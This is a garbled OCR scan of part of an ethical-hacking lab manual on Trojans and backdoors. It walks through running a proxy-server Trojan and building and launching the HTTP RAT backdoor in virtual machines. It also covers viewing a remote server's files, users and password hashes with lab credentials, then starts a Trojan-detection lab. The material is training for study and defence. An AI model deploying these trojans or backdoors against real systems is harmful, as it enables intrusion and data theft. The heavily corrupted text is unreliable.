i . SUIT'ojans C30V
L. -T IP t-rr‫־‬P5 Tro;a
C‫׳‬e a re 9 xjrtcjt
I , :CKPBdCkdCOr
Proxy Se‫־‬ver Irojf
Jg \ \ 35PtOtv TrQ* Prooenes
- .. t i n m i G H ‫־‬: ‫ ־־‬.

FIGURE 4.1: Windows Server 2008: CmdHere

2. Now type die command dir to check for folder contents.

FIGURE 4.2: Directory listing of Proxy Server folder

3. The following image lists die directories and files 111 the folder.

C E H L ab M an u al P age 447 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

-1‫ | ם‬x
|Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > d i r
I U o lu n e i n d r i v e Z h a s n o l a b e l .
I U o lu n e S e r i a l N um ber i s 1677-7DA C
I D i r e c t o r y o f Z :\C E H v8 M odule 06 T r o j a n s a n d B a c k d o o r s V T r o ja n s T y p e s \P r o x y S e r v e
I r T r o ja n s
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR>
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR>
1 0 2 /1 7 /2 0 0 6 1 1 :4 3 AM 5 ,3 2 8 n c a f e e .e x e
1 0 9 /1 9 /2 0 1 2 0 1 : 0 7 AM <DIR> W 3bPr0xy T r 0 j 4 n C r 3 4 t 0 r <Funny Nane>
1 rFiill e <^ ss>; b5 ,3
,J 2 8 b y te s
3 D ir < s > 2 0 8 , 2 8 7 ,7 9 3 , 1 5 2 b y t e s f r e e
Z :\C E H v 8 M odule 06 T r o j a n s a n d B a c k d o o r s S T r o j a n s T y p e s \P r o x y S e r v e r T r o j a n s > —

FIGURE 4.3: Contents in Proxy Server folder

Type die command m cafee 8080 to mil the service 111 Windows Server

FIGURE 4.4: Starting mcafee tool on port 8080

5. The service lias started 011 port 8080.

6. Now go to Windows Server 2012 host machine and contigure the web
browser to access die Internet 011 port 8080.
7. 111 diis lab launch Clirome, and select Settings as shown 111 die
following figure.
Q 2 wwwgoogtorofv ■

m Tliis process can be

attained in any browser * C.pj
after setting die LAN lo*r ico* • O
settings for die respective

11■-‫׳‬w‫״‬n•‫ •״‬...
FIGURE 4.5: Internet option of a browser in Windows Server 2012

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

8. Click the Show advanced settings 1111k to view the Internet settings.

FIGURE 4.6: Advanced Settings of Chrome Browser

9. 111 Network Settings, click Change proxy settings.

C 0 chrcyncv/dVOflM.'Mttnpt/

I Clvotue S e ttin g s

4 Enitoir AutaMtc M Ml*«Dtom n *u« « c»rt. VUu)tAdofl <nflf(1

Gocgit Owcfnt isw9n«y««»ccm^uKrs s>S«m tc connec tc the rctMOrfc.
| OwypwstBnjt-

it (UQMthjt w«n>r 1l*nju*9«I w

0 01
Covmlaad kcabot: C.'lherrAi rnncti rt AT T to><i
U Ast »hw 10 w «Kt! lit M m dw»«10><«9


FIGURE 4.7: Changing proxy settings of Chrome Browser

10. 111 die Internet Properties window click LAN settings to configure
proxy settings.

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M od ule 0 6 - T rojans and Backdoors

Internet Properties

General [ Security ] Privacy ] Content Connections | Programs ] Advanced

To set up an Internet connection, dick Setup


Dial-up and Virtual Private Network settings

Choose Settings if you need to configure a proxy

server for a connection.

(•) Never cfal a connection

O Dial whenever a network connection is not present
O Always dal my default connection

Current None Sgt default

Local Area Network (LAN) settings ------------------------------------------------------

LAN Settings do not apply to dial-up connections, | LAN settings \

Choose Settings above for dial-up settings.

OK ] | Cancel J ftpply

FIGURE 4.8: LAN Settings of a Chrome Browser

11. 111 die Local Area Network (LAN) Settings window, select die U se a
proxy server for your LAN option 111 the Proxy server section.
12. Enter die IP address o f Windows Server 2008, set die port number to
8080, and click OK.

F T Local Area Network (LAN) Settings

Automatic configuration
Automatic configuration may override manual settings. To ensure the
use o f manual settings, disable automatic configuration.

@ Automatically detect settings

‫ ח‬Use automatic configuration script


Proxy server

Use a proxy server for your LAN (These settings will not apply to
dial-up or VPN connections).

Address: Port: 8080 Advanced

I !Bypass proxy server for local addresses!

OK Cancel

FIGURE 4.9: Proxy settings of LAN in Chrome Browser

13. Now access any web page 111 die browser (example:

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M od ule 0 6 - T rojans and Backdoors

FIGURE 4.10: Accessing web page using proxy server

14. The web page will open.

15. Now go back to Windows Server 2008 and check die command
A d m in is tra to r C :\W m dow * \s y *te m 3 2 \c m d .e x e - m cafee 8080
w w w .g o o g le .c o : / c o n p l e t e / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 & c l i e n t = c h ro n e 8 rh l= er :1 2 0 0
. US8rq=bbc. c o - |
A c c e p ti n g New R e q u e s ts ■
w w w .g o o g le .c o :1 2 0 0 / c o n p l e te / s e a r c h ? s u g e x p = c h r o m e ,n o d = 1 8 8 t c l i e n t s‫־‬c h ro n e 8 rh l= e n
l~ U S & q = b b c .c o .u
A c c e p ti n g New R e q u e s ts !
A c c e p ti n g New R e q u e s ts !
A c c e p ti n g New R e q u e ■ * * ‫־‬ ^
/ c o n p l e te / s e a r c h ? s u g e x p = c h r o r o e ,n o d = 1 8 8 tc l i e n t = c h ro n e 8 th l= e r
l-U S & a = b b c . c o . u k
| / :b b c . c o . u k :1 3 0 1
H c c e p ti n g New K e q u e s ts ■
A c c e p ti n g New R e q u e s ts ■
/ :w w w .b b c .c o .u k : 1 2 0 0
A c c e p ti n g New R e q u e s ts !
m Accessing web page A c c e p ti n g New R e q u e s ts ■
A c c e p ti n g New R e q u e s ts !
using proxy server A c c e p ti n g New R e q u e s ts !
A c c e p ti n g New R e q u e s ts ■
A c c e p ti n g New R e q u e s ts !
A c c e p ti n g New R e q u e s ts !
s t a t i c . b b c i . c o . u k : / f r a n e w o r k s / b a r l e s q u e / 2 . 1 0 . 0 / d e s k t o p / 3 . 5 / s t y l e / r * a i n . c s s :2 0 0 !
A c c e p ti n g New R e q u e s ts ■
s t a t i c . b b c i . c o . u k : / b b c d o t c o n / 0 . 3 . 1 3 6 / s t y l e / 3 p t _ a d s . c s s :2 0 0 !
A c c e p ti n g New R e q u e s ts ! ________________________________________________________________________

FIGURE 4.11: Background information on Proxy server

16. You can see diat we had accessed die Internet using die proxy server

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s searn tv posture and exposure dirough public and tree information.

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All Rights Reserved. Reproduction is Strictly Prohibited.
M odule 0 6 - T rojans and Backdoors



T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

Proxy Server O u tp u t: Use the proxy server Trojan to access the
T ro jan Internet
Accessed webpage:

1. Determine whether McAfee HTTP Proxy Server Trojan supports other
ports that are also apart from 8080.

2. Evaluate the drawbacks o f using the HTTP proxy server Trojan to access
the Internet.

In te rn e t C o n n ectio n R equired
0 Yes □ No
P latform S up p o rted
0 C lassroom □ !Labs

C E H L ab M an u al P age 452 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M odule 0 6 - T rojans and Backdoors

HTTP Trojan
A. Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a iray that it can get control and cause
damage, such as mining thefile allocation table on a hard drive.

ICON KEY Lab Scenario

/' Valuable Hackers have a variety ot motives for installing malevolent software (malware).
This types o f software tends to yield instant access to the system to
S Test your continuously steal various types o f inform ation from it, for example, strategic
k n o w led g e_______ company’s designs 01‫ ־‬numbers o f credit cards. A backdoor is a program or a set
* Web exercise o f related programs that a hacker installs 011 the victim computer to allow
access to the system at a later time. A backdoor’s goal is to remove the evidence
£Q! Workbook review o f initial entry from the systems log. Hacker—dedicated websites give examples
o f many tools that serve to install backdoors, with the difference that once a
connection is established the intruder m ust log 111 by entering a predefined
You are a Security Administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor
H Tools The objectives o f the lab include:
demonstrated in
this lab are • To run H TTP Trojan 011 Windows Server 2008
available in • Access the Windows Server 2008 machine process list using the H TTP
Module 06 Trojans • Kill running processes 011 Windows Server 2008 Virtual Machine
and Backdoors
Lab Environment
To carry out diis, you need:

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

‫י‬ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and

Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN
■ A computer nuining Window Server 2008 (host)
■ Windows 8 nuniing 111 Virtual Maclune

■ Windows Server 2008 111 Virtual Machine

■ If you decide to download the la te st version, then screenshots shown
111 the lab might differ

■ You need a web browser to access Internet

■ Administrative privileges to m n tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data 111 such a way diat it can get control and cause
damage, such as ruining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance may differ from
what it is 111 die lab, but die actual process of connecting to die server and accessing
die processes is same as shown 111 diis lab.

Lab Tasks
HTTP RAT 1. Log 111 to Windows 8 Virtual Machine, and select die Start menu by
hovering die mouse cursor on die lower-left corner of die desktop,

Rtcytlt Dm



W indow s 8 Release Previev.

‫ז>■׳‬8‫ח‬ Evaluation copy Build 840C

FIGURE 5.1: Windows 8 Start menu

2. Click Services ui the Start menu to launch Services.

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M od ule 0 6 - T rojans and Backdoors



m m 9 Chrome

Mozilla services

.... ‫ י‬5‫י‬ Weiner

* Firefox


m B
Internet Explorer Slcfe

m aS
Uapt SfcyDrwe

>PP1:1 ■:he \\" u'.a ^

Wide Web Publisher is
mandatory as HTTP RAT FIGURE 5.2: Windows 8 Start menu Apps
runs on port 80 _ . , , _
3. Disable/Stop World Wide Web Publishing Services.

File Action View H«Jp

+ 1H1 Ei a HI 0 a l »
Services ;local)

World Wide W eb Pubfahng Service N am e Description Status Startup Type Log A

3 4 ‫־‬W indow s Firewall W indow s F 1.« Running A utom atic Loc
V/indcv/s Font Cache Service Optimizes p... Running A utom atic Loc
W indow s Im age Acquisitio... Provides im... M snu3l
W indow s Installer Adds, modi... M enusl Loc
Description: V W indow s M anagem ent Inst.. Provides a c... Running A utom atic LOC
Provides W eb c o m e c tr/rty and
•^ W in d o w s M edia Player Net... Shares Win... M anual Net
adm in s tr a to n th ro u g h th e Interret
Infcrm ation Services M anager ‫ ^־‬W in d o w s M odules Installer Enables inst... M anual
£$ V /indcw s Process Activatio... T heW indo... Running M anual
‫׳‬£ $ W indow s R em ote M anage... W indow s R... M enusl Net
W indow s Search Provides CO.- Running A utom atic (D._ Loc
W indow s Store Service (W5... Provides inf... M anual (Tng... LOC
W indow s Tim# M aintains d... M anual (T ng.. Loc
Q W indow s Update Enables t h e ... M anual (Tng... Loc
*%WinHTTP Web Proxy A uto ... WinHTTP i... Running M anual Loc
3% Wired A utoConfig T he W ire d ... M anual L0C
'•& WLAN A utoConfig The WLANS... M anual LOC
■I^WM Perform ance Adapter Provide; pe.. M anual lo c
W orkstation Cr«at«c and... Running A utom atic N tt
P I W orld W ide W eb Publnhin... Provide! W... Running M enusl u M
- WWAN A utoConfig This service .. M anual LOC v
< >
\ Mended ^Standard/

FIGURE 5.3: Administrative tools -> Services Window

4. Right-click the World Wide Web Publishing service and select

Properties to disable the service.

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M od ule 0 6 - T rojans and Backdoors

W orld W ide W eb Publishing Service Properties (L o ca l...

Genera1 Log On Recovery Dependencies

Service name: W3SVC

Display name: World Wide Web Publishing Service

Description: ivides Web connectivity and administration

)ugh the Internet Information Services Manager

Path to executable:
C:\Windows\system32\svchost.exe -k iissvcs

Startup type: Disabled

Helo me configure service startup options.

Service status: Stopped

Start Stop Pause Resume

You can specify the start parameters that apply when you start the service
from here

Start parameters

OK Cancel Apply

FIGURE 5.4: Disable/Stop World Wide Web publishing services

5. N ow start HTTP RAT from die location Z:\CEH-Tools\CEHv8

Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS

□ HTTP RAT 0.31

r V 'k H T T P R A T
IUUI The send notification
f -W !backdoor Webserver
option can be used to send
J by zOmbie
the details to your Mail ID ?J

latest version here: []

W send notification with ip address to mail

SMTP server 4 sending mail

u can specify several servers delimited with ;
smtp. mail. ru;$ome. other, smtp. server;
your email address:

close FireWalls server port: [80"

Create Exit

FIGURE 5.5: HTTP RAT main window

6. Disable die Send notification with ip address to mail option.

7. Click Create to create a httpserver.exe file.

C E H L ab M an u al P age 456 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

□ HTTP RAT 0.31 E ll

/V K H T T P R A T
I !backdoor W ebserver
if■• T J h y 20mbie
v 0 .3 1
. 1
latest version here: []

send notification with ip address to mail|

SMTP server 4 sending mail

u can specify several servers delimited with ;
| smtp. mail. ru;some. other, smtp. server;

your email address:


close FireWalls server port: 180

|i Create j| ‫־‬ Exit

FIGURE 5.6: Create backdoor


0 2 Tlie created
httpserver will be placed in
the tool directory /V \H T T P RAT
I -W ^backdoor Webserver

send http5erver.exe 2 v ic tim



w close FireWalls server pork:[

Create Exit

FIGURE 7.‫כ‬: Backdoor server created successfully

8. Tlie httpserver.exe tile should be created 111 die folder Z:\CEHv8

Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS
9. Double-click the tile to and click Run.

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M od ule 0 6 - T rojans and Backdoors

A pplication Tool* HTTP RAT TROJAN

M om gc

BQ New item ‫י‬ * S I O pen ‫י‬ EE s««t >11

IS □ * " Im-J Cod / path Easy access ‫י‬ 0 Edit ‫ ״ ח‬Select a one

0 »«te <harcut to * to • <t) History □ D Inrert <elert10 n

Clipboard | 01
Open File ‫ ־‬Security Warning
o® I « HTTP HTIPS Trojans >

N 3m e The publisher could n o t bp v e rifie d . A re you d ir e you w an t t o run t h k

softw are?
■ Desktop Z itt p ia t
[g j ‫ה־‬N a m e ...TTP HTTPS T rojans\H TTP RAT TRO JA N \httpservcr.cxc
4 D ow nloads | h tlpscfvcr |
~ Publisher: U n k n o w n Publisher
*S&l R ecent places
T ype A pplication
1 . rea d m e
^ Libraries From: Z:\CEHv8 M o d u le 06 Trojans a nd B ackdoors J r o j a n s T ‫״‬

1111 D o cum ents

Music Run Cancel
B Pictures
g £ Videos

This file d o c s n o t have ‫ ג‬valid digital signature th a t verifies its

H o m e g ro u p ^3. publisher. You sh o u ld only run softw are fro m publishers y o u tr u s t
T® Computer
i l . Local Oslr (C:)
4 - ‫ ׳‬CEH-Tcols (\\10.
I p Admin (admin-p

4 item s 1 item selected iO. : KB

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check if die process is mnning.

File Options View

Processes Performance App history Startup Users Details Services

30% 52% 4% 0%
Name Status CPU Memory Disk Network

Apps (2)
> Task Manager 1.9% 6.8 MB 0 MB/s 0 Mbps

> ^ Windows Explorer 0% 25.1 MB 0.1 MB/s 0 Mbps

Background processes (9)

H Device Association Framework... 0% 3.3 MB 0 MB/s 0 Mbps

S I Httpserver (32 bit) 0% 1.2 MB 0 MB/s 0 Mbps

Microsoft Windows Search Inde... 0% 4.9 MB 0 MB/s 0 Mbps

tflf' Print driver host for applications 0% 1.0 MB 0 MB/s 0 Mbps

m Snagit (32 bit) 19.7% 22.4 MB 0.1 MB/s 0 Mbps

j[/) Snagit Editor (32 bit) 0% 19.2 MB 0 MB/s 0 Mbps

[■‫ ]־־‬Snagit RPC Helper (32 bit) 1.7% 0.9 MB 0 MB/s 0 Mbps

t> OR) Spooler SubSystem App 0% 1.5 MB 0 MB/s 0 Mbps

0 TechSmith HTML Help Helper (... 0% 0.8 MB 0 MB/s 0 Mbps

W in d o ‫־‬.*;■‫־‬. :‫ ־>־׳(־‬ff• ‫־‬, '‫־‬t‫־‬-‫־‬, ~‫ ׳‬:

( * ) Fewer details

FIGURE 5.9: Backdoor running in task manager

11. Go to Windows Server 2008 and open a web browser to access die
Windows 8 machine (here “” is die IP address ot Windows 8

C E H L ab M an u al P age 458 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

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M od ule 0 6 - T rojans and Backdoors


c | I £« ‫ ״‬iooale P] * D -

welcome 2 IITTP_RAT infected computer } : ]

.es] [brov!6«] [comouter info] [stoo httorat] [have auaaestions?] [homeoace]

w p lr n m e }:J

FIGURE 5.10: Access the backdoor in Host web browser

12. Click running processes to list the processes running on die Windows
8 machine.
Z>nbe's HTTP_RAT

1,4■ & 10.0.0. iZproc___________ C ? 1 ‫ ־‬ioojle P A E-

running processez:

[system Process]
S/stem Ikilll
srrss.exe [kill]
v*‘ninit.exe[M !]
w nlogon.exe
[M !]illl
services.exe f kill]
kass.exe [ki!!]
;vchoctoxQ r < n 111
:vcho5t.exe r!<ilfl
svchostexe f kiin
dvirr.exe Ikilll
svchostexe [kill] [MID
:vchost.cxa [UdD
svchostexe [hjjj]
spoolsv.exe [kilfl
svchostexe | kill)
svchostexe [kill]
d3cHoct.ova f l-illl
svchostexe [killl
5vchost.exe [ kiTTj
tackho*!f.®x*» [kill]
tacU fioct.oxo[ ■ !I]
M p k x a r .t M [ M 1]
searchlndexer.exe fkilfl
Snag1t32.exe [joj]
TscHelp.exe [kill]
SnagitCditor.exe[I dj]
svchostexe fktlll
httpserver.exe (kill]
Taskmor.«»x* Ik-illl

FIGURE 5.11: Process list of die victim computer

13. You can kill any running processes from here.

Lab Analysis
Analyze and document the results related to die lab exercise. Give your opinion on
your target’s secuntv posture and exposure dirough public and tree mformadon.

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M odule 0 6 - T rojans and Backdoors



T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

Successful send httpserver.exe 011 victim machine
O u tp u t: Killed Process
H T T P T ro jan winlogon.exe
serv 1ces.exe

1. Determine the ports that HTTP proxy server Trojan uses to communicate.

In tern e t C o n n ectio n R eq u ired

□ Yes 0 No
P latform S upported
0 C lassroom 0 iLabs

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M odule 0 6 - T rojans and Backdoors

Remote Access Trojans Using

Atelier Web Remote Commander
.4 Trojan is a program that contains malicious or harmful code inside apparently
harmless programming or data in such a )),ay that it can get control and cause
damage, such as ruining thefie allocation table on a hard drive.
ICON KEY Lab Scenario
/ Valuable A backdoor Trojan is a very dangerous infection that compromises the integrity
o f a computer, its data, and the personal inform ation o f the users. Remote
y 5 Test your attackers use backdoors as a means o f accessing and taking control o f a
knowledge computer that bypasses security mechanisms. Trojans and backdoors are types
TTTTT Web exercise o f bad-wares; their main purpose is to send and receive data and especially
commands through a port to another system. This port can be even a well-
m Workbook review known port such as 80 or an out o f the norm ports like 7777. Trojans are most
o f the time defaced and shown as legitimate and harmless applications to
encourage the user to execute them.
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.

Lab Objectives
JT Tools The objective o f tins lab is to help students learn to detect Trojan and backdoor
demonstrated in attacks.
this lab are
The objectives o f tins lab include:
available in
D:\CEH- • Gain access to a remote computer
Module 06 Trojans • Acquire sensitive information o f the remote computer
and Backdoors
Lab Environment
To cany out tins, you need:
1. Atelier Web Rem ote Commander located at D:\CEH-Tools\CEHv8
Module 06 Trojans and Backdoors\Trojans Types\R em ote A c c e ss
Trojans (RAT)\Atelier Web Rem ote Commander

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M od ule 0 6 - T rojans and Backdoors

■ A computer running Window Server 2008 (host)

■ Windows Server 2003 running in Virtual Machine

■ If you decide to download the la te st version, then screenshots shown

111 the lab might differ

■ You need a web browser to access Internet

■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m alicious or harmful code inside apparently
harmless programming or data 111 such a way that it can get control and cause
damage, such as ruining the tile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may dilfer from
what it is 111 die lab, but die actual process of connecting to die server and accessing
die processes is same as shown 111 diis lab.

a* TASK 1 Lab Tasks

1. Install and launch Atelier Web Rem ote Commander (AWRC) 111
Atelier Web
Remote Windows Server 2012.
Commander 2. To launch Atelier Web Rem ote Commander (AWRC), launch the
Start menu by hovering the mouse cursor on the lower-left corner o f
the desktop.

■ 3 W indow s Server 2012

?DMw CMidM•
u.t Ev
pt.Eu dM0C
.rw *13PM1

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. Click AW Rem ote Commander Professional 111 the Start menu apps.

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M od ule 0 6 - T rojans and Backdoors

Start Administrator A

CtnvUcr T

Took fieoiote

4 &

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window o f AWRC will appear as shown 111 the following
‫סי‬ AWRC PRO 9.3.9
File Tools Help

Desktop Syclnfo Netwarklnfo FJ# Sy*t*fn Uc*rs *nr. Grocpc Chat

‫ט‬ Tliis toll is used to

gain access to all the
information of die Remote

Progress Report

y , Connect Disconnect

df 0 Request ajthonrabor @ dear on iscomect

ffiytesln: C k8psln: 0 Connection Duraton

FIGURE 6.3: Atelier Web Remote Commander main window

5. Input the IP address and Usernam e I Passw ord o f the remote

6. 111 tins lab we have used Windows Server 2008 (
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ 111 your labs
7. Click Connect to access the machine remotely.

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M od ule 0 6 - T rojans and Backdoors

FIGURE 6.4: Providing remote computer details

Tools 8. The following screenshots show that you will be accessing the
demonstrated in Windows Server 2008 remotely.
this lab are
S :AW RC PRO 9.3.9
available in File Tools Help

D:\CEH- Desktop Syslnfo Networidnfb Fie System Use's anc Groups Chat

Module 06 Trojans
and Backdoors

Internet Explo‫־‬er

windows update

j Notepad

<r ~
& Fastest *T F V *29 Monitors *

Remote Host Progress Report

| administrator #16:28:24 Initializing, please wait...
#16:28:25 Connected to
W Connect ^ Disconnect

c f □ R e q u est a jth o n ia b o r @ Clear on is c o m e c t

k5yle*I11; 201.94 k B ^ IiL 0 .8 7 Cum cLiim i D uia im i: iMinuce, 42 Seconds.

FIGURE 6.5: Remote computer Accessed

9. The Commander is connected to the Remote System. Click tlieSys

Info tab to view complete details o f the Virtual Machine.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

FIGURE 6.6: Information of the remote computer

10. Select Networklnfo Path where you can view network information.
S AWRC PRO 9.3.9
File Iools Help

Desktop Syslnfo | NetworiJnfo | Ffe System Use's anc Grocps Chat

\ Ports Safeties
\ P /T ra n sp o rt Protocols

Remark Permissions Max Uses Current Uses Path Passwoid

ADMINS Spe . Remote Admin net applica... unlimited not val■
C$ Spe .. Default share not applica.. unlimited not vali
& Tools IPCS Spe .. Remote IPC net applica unlimited not vaN

demonstrated in
this lab are
available in
Module 06 Trojans
and Backdoors
Remote Host Progress Report
#16.28.24 Initializing, please wait
#16:28:25 Connected to 10 0.0.13
^ Connect A / Disconnect

eP D Request ajthonrabor @ dear on iscomect

Ifiy te s ln : 250.93 kSps In: 0.00 Connection Duraton: 5 Minutes, 32 Seconds.

FIGURE 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and
click Get.
12. Tins tab lists the complete files ol the C :\ drive o f Windows Server

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M od ule 0 6 - T rojans and Backdoors

10.0.0 .1 3 : AW R C PRO 9.3.9

file Iools Help

Desktop Syslnfo NetworicJnfb I Fie System I Use's and Groups Chat

co n te n ts o f 'c:'_______
CIJ SRecycle Bin
Cl Boot
C3 Documents and Settings
C□ PerfLogs
D Program Files (x86)
□ Program Files
Cl ProgramData
D System Volume Inform...
□ Users
□ Windows

File System: NTFS Type Fixed Capacity: 17,177,767.936 bytes

Serial Number: 6C27-CD39 Labei: Free space: 6.505.771.008 bytes

Progress Report
| administrator #16.28.24 Initializing, please wait...
Password #16:28:25 Connected to
^ Connect Disconnect

cf ] Request ajthoriratxx‫־‬ @ Oear on is c o m e c t

kBytesIn: 251.64 ConnectonCXjraton: 6 Minutes, 18 Seconds.

FIGURE 6.8: Information of the remote computer

13. Select U sers and Groups, which will display the complete user
details. :A W R C PRO 9.3.9 '‫ ־‬: ‫" ם‬
File Jools Help

Desktop Syslnfo NetworkJnfo Ffe System Use's anc Groups I Chat

j Users ^ Groups \ Password H a^ies

User Information for Administrator

User Account. Administrator
Password Age 7 days 21 hours 21 minutes 33 seconds
Privilege Level: Administrator
Comment Built-in account for administering the computer/domain
Flags: Logon script executed. Normal Account.
Full Name:
Workstations can log from: no restrictions
Last Logon: 9/20/2012 3:58:24 AM
Last Logoff: Unknown
Account expires Never expires
User ID (RID) 500
Pnmary Global Group (RID): 513
SID S 1 5 21 1858180243 3007315151 1600596200 500
No SubAuthorties 5

Remote Host User Name Progress Report

1 [ administrator #16:28:24 Initializing, please wait...
Password #16:28:25 Connected to
W Connect ^ Disconnect

nf D Request ajthon:at>or @ Oear on is c o m e c t

kByle* 111: 256.00 C um euiim i3u1atu< 1: e Minutes, 2 6 Seconds.

FIGURE 6.9: Information of the remote computer

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All Rights Reserved. Reproduction is Stricdy Prohibited.
M od ule 0 6 - T rojans and Backdoors

rs AWRC PRO9.3.9

file Iools Help

Desktop Syslnfo NetwortJnfo We System Use's and Groups Chat

\ | Groups ~ | y Passwoid Ha«hes

Names SID Comment

Groups: Administrators S-1-5-32-544 (Typo Alias/Do Administrators have complete and unrestricted
Backup Operator S-1-5-32-551 (Type Alias/Do Backup Operators can override security restrict
Certificate Service DC S-1-6-32-674 (Type Alias/Do . Members of this group are allowed to connect t«
Cryptographic Oserat S-1-5-32-569 (Type Alias/Do Members are authorized to perform cryptograph
Distributed COM Use‫־׳‬s S-1-5-32-562 (Type Alias/Do . Members are allowed to launch. actKate and us
Event Log Readers 5-1-5-32-573 (Type Alias/Do... Members of this group can read event logs from
Guests S-1-5-32-546 (Type Alias/Do Guests have the same access as members oft
<1 _____I
G ro u p s : S -1-5-21-1858180243-3007315... Ordinary users

Progress Report
| administrator #16.28.24 Initializing, please wait...
Password #16:28:25 Connected to
^ Connect Disconnect

c f ] Request a jth on rab or @ d e a r on is c o m e c t

kBytesIn: 257.54 Connection Ouraton: ?Minutes, 34Seconds.

FIGURE 6.10: Information of the remote computer

FIGURE 6.11: Information of the remote computer

14. Tins tool will display all the details o f the remote system.
15. Analyze the results o f the remote computer.

Lab Analysis
Analyze and document tlie results related to die lab exercise. Give your opinion on
your target’s security posture and exposure dirough public and tree information.

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M odule 0 6 - T rojans and Backdoors



T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

Remotely accessing Windows Server 2008

R esult: System inform ation o f remote Windows

Server 2008
Network Information Path remote Windows Server
Atelier Web
Commander viewing complete tiles of c:\ o f remote Windows
Server 2008
User and Groups details o f remote Windows Server
Password hashes

1. Evaluate die ports that A\\”RC uses to perform operations.

2. Determine whether it is possible to launch AWRC from the command line

and make a connection. If ves, dien illustrate how it can be done.

In tern e t C o n n ectio n R eq u ired

□ Yes 0 No
P latform S upported
0 C lassroom

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M odule 0 6 - T rojans and Backdoors

Detecting Trojans
A Trojan is aprogram that contains malicious or harmful code inside apparently
harmlessprogramming or data in such a >raj that canget control and cause damage,
such as mining thefile allocation table on a hard drive.

ICON KEY Lab Scenario

f~'/ Valuable Most individuals are confused about the possible ways to remove a Trojan virus
from a specific system. One m ust realize that the World Wide W eb is one o f
.‫ *'■׳י‬Test your the tools that transmits information as well as malicious and harmful viruses. A
____ knowledge______ backdoor Trojan can be extremely harmful if not dealt with appropriately. The
Web exercise ^ main function o f tins type o f virus is to create a backdoor 111 order to access a
specific system. With a backdoor Trojan attack, a concerned user is unaware
m Workbook review about the possible effects until sensitive and im portant information is found
missing from a system. With a backdoor Trojan attack, a hacker can also
perform other types ot malicious attacks as well. The other name for backdoor
Trojans is remote access Trojans. The main reason that backdoor Trojans are
so dangerous is that they hold the ability to access a particular machine remotely
(source: http://w w w .com
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor
The objectives o f the lab mclude:

& Tools • Analyze using Port Monitor

demonstrated in
• Analyze using Process M onitor
this lab are
available in • Analyze using Registry Monitor
Tools\CEHv8 • Analyze using Startup Program Monitor
Module 06 Trojans
• Create MD5 hash tiles for Windows directory files
and Backdoors

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M odule 0 6 - T rojans and Backdoors

Lab Environment
To carry out this, you need:
■ Tcpview, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and
B ackdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and
B ackdoors\Process Monitor Tool\Prc View
■ Jv16 power tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
‫י‬ FsumFrontEnd. located at D:\CEH-Tools\CEHv8 Module 06 Trojans
and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■ A computer running Window Server 2008 (host)
& Disabling and Deleting
■ Windows Server 2003 running 111 Yutual Machine
If you don't want an entry to ■ If you decide to download the la te st version, then screenshots shown
active die nest time you
111 the lab might differ
boot or login you can either
disable or delete it. To
disable an entry uncheck it. ■ You need a web browser to access Internet
Autoruns will store die
startup information in a ■ Administrative privileges to run tools
backup location so diat it
can reactivate die entry
when you recheck it. For Lab Duration
items stored in startup
folders Autoruns creates a Tune: 20 Minutes
subfolder named Aiitoruns
disabled. Check a disabled
item to re-enable it Overview of Trojans and Backdoors
A Trojan is a program diat contains m alicious or harmful code inside apparently
harmless programming or data 111 such a way that it can get control and cause
damage, such as ruining die lile allocation table on a hard drive.
Note: The versions of the created client or host and appearance may differ from
